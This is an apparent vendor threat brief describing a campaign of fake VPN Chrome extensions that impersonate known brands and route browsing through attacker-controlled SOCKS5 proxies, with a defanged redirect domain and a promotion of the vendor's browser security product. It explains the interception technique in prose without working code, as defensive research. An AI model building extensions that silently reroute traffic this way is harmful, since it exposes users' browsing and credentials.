Browser Threat Brief: Fake VPN Extensions Turn Browser Privacy Tools Into Traffic Interception Risk 

By: Almas Raza 

Browser extensions are often installed to improve productivity, security, or privacy. But when attackers abuse that trust, the browser itself can become the attack surface.

Palo Alto Networks researchers identified a fake VPN extension farm involving dozens of Chrome extensions operated by a single threat actor. These extensions appeared to provide VPN functionality, but instead routed user browsing traffic through 15 hardcoded SOCKS5 proxy servers under the threat actor’s control.  At least four of the extensions directly impersonated major legitimate VPN brands, including AdGuard VPN, Proton VPN, BrowSec VPN, and HideMyName VPN, to deceive users looking for trusted privacy tools.

This blog explains how the attack works, what the extension code revealed, why this campaign appears larger than a single bad extension, and what organizations can do to reduce exposure.

Note: This finding was originally shared through Palo Alto Networks Unit 42 Timely Threat Intelligence, which provides additional research context.

Threat at a Glance 

How the Attack Works  

Step 1: User Searches for a Trusted VPN Tool 

The attack begins with a user looking for a VPN extension to protect their browsing activity. The user finds what appears to be a legitimate privacy tool, which makes the lure especially effective because VPN extensions are commonly associated with security, privacy, and safer web access.

In this campaign, the threat actor created dozens of fake VPN Chrome extensions, including extensions that impersonated well-known VPN brands. This gave the extensions a credible appearance and increased the likelihood that users would install them.

Step 2: The Extension Appears Legitimate and Gains Trust 

The extensions used familiar VPN branding, Chrome Store identities, and extension-style packaging that looked like normal browser software.

The threat actor also used multiple Chrome Store publisher identities, with each identity associated with multiple VPN extensions. This helped the campaign scale and made it harder to connect the extensions back to a single operator based on publisher information alone.  

Step 3: The Extension Takes Control of Browser Traffic Settings

After installation, the extension gains the ability to modify how the browser routes web traffic. For a VPN extension, this may appear expected because users assume the tool needs network-level access to provide privacy protection.

In this case, that trusted access is abused. Instead of connecting users to a legitimate VPN service, the extension uses browser proxy settings to redirect traffic through infrastructure controlled by the threat actor.

Step 4: Browser Traffic Is Routed Through Attacker-Controlled Proxies 

Once the proxy configuration is applied, the extension routes browser traffic through attacker-controlled SOCKS5 proxy servers instead of a trusted VPN service. 

Instead of protecting the user’s browsing activity, the fake VPN extension creates a new interception point. Because it does not provide actual VPN encryption, the threat actor can observe all browsing activity, including every visited URL and HTTP credentials.

Step 5: Impact on the User or Organization

These fake VPN extensions create the opposite of the privacy protection users expect. By routing browser traffic through attacker-controlled SOCKS5 proxies, they can expose visited URLs, HTTP credentials, and sensitive browser activity to the threat actor.

For organizations, the risk is broader than one user installing a bad extension. Enterprise work now happens in the browser across SaaS applications, webmail, collaboration tools, internal portals, and AI services. A malicious extension with control over browser traffic can turn routine web activity into an opportunity for data exposure, credential theft, and traffic manipulation.

What the Extension Code Revealed

The code analysis showed that these fake VPN extensions were not isolated, one-off extensions. They were part of a connected extension cluster that reused the same infrastructure and followed the same core behavior across multiple Chrome Store listings.

Every extension contained the same server list embedded in its service worker JavaScript. Although the threat actor used three different code templates with different variable names, all templates shared the same proxy IP list and the same sverchtun[.]store domain. They also performed the same core actions: calling chrome.proxy.settings.set() with a SOCKS5 configuration and storing the selected proxy server in memory..

This shared code, infrastructure and behavior helped connect the extensions to the same broader fake VPN operation. The use of different templates and variable names may have been intended to make the extensions appear different during review, but the underlying functionality remained the same.

The code also revealed first-install behavior that did not align with the **extensions’** stated purpose. Each extension **was configured to automatically open** `hxxps://sverchtun[.]store/` when installed, without user consent. This redirect was hardcoded in the service worker’s `onInstalled` handler and pointed users to a fake monetization website that did not match what the VPN extensions were actually doing.

Why This Is Hard to Detect 

Fake VPN extensions can be difficult to detect because their behavior may appear related to their stated purpose. A VPN extension changing proxy settings may not look suspicious at first glance, especially if the extension is presented as a privacy tool. 

The problem is that Chrome Store presence and familiar branding do not always guarantee safety. Threat actors can use marketplace signals and privacy-focused messaging to make an extension appear legitimate while the extension’s actual behavior tells a different story.

This is why extension security cannot rely only on first-time installation checks or marketplace metadata. Risk can appear through publisher behavior, shared infrastructure, code similarity, update activity, runtime behavior, and whether the extension’s actual behavior matches its stated purpose.

URL intelligence also plays an important role in detecting these threats. Browser extensions often depend on external infrastructure, including domains, redirect pages, fake monetization sites, proxy services, and attacker-controlled infrastructure. Correlating extension behavior with URL and domain intelligence can help identify suspicious infrastructure reuse and connect seemingly separate extensions to the same broader campaign.

How Palo Alto Networks Helps Protect Customers 

Palo Alto Networks helps organizations reduce browser extension risk with Advanced Extension Security in Prisma Browser, providing protection across the full extension lifecycle: installation, updates, runtime behavior, and remediation.

Prisma Browser Advanced Extension Security analyzes extension metadata, permissions, publisher reputation, source code, API calls, network activity, and runtime behavior. For fake VPN extensions, this helps identify signals such as proxy manipulation, suspicious infrastructure reuse, brand impersonation, repeated code templates, and behavior that does not match the extension’s stated purpose. 

Advanced Extension Security is also strengthened by intelligence from Palo Alto Networks cloud-delivered security services, helping correlate extension behavior with suspicious domains, redirect infrastructure, proxy services, and attacker-controlled web infrastructure. 

When an extension is determined to be risky or malicious, Prisma Browser can take policy-based action, including blocking installation, preventing risky updates, notifying users, and automatically removing malicious extensions.

Conclusion

This campaign shows how attackers can abuse the trust users place in browser privacy tools. A fake VPN extension does not need to behave like traditional malware to create meaningful risk. By controlling browser proxy settings, it can turn normal browsing activity into an opportunity for traffic interception, visibility into visited URLs, and potential credential exposure.

As more enterprise work moves into the browser, extensions have become a powerful part of the user environment. Organizations need visibility beyond the initial install to understand how extensions behave during updates and at runtime.

Advanced Extension Security with Prisma Browser helps close this gap by analyzing extensions across installation, updates, runtime behavior, and remediation. This lifecycle approach helps organizations identify extensions that look legitimate on the surface but introduce real security and privacy risk once they operate inside the browser.

Indicators 

Table below lists selected xx fake VPN Chrome extensions:

Additional Information

To see Advanced Extension Security in action, schedule a Prisma Browser demo with your Palo Alto Networks team.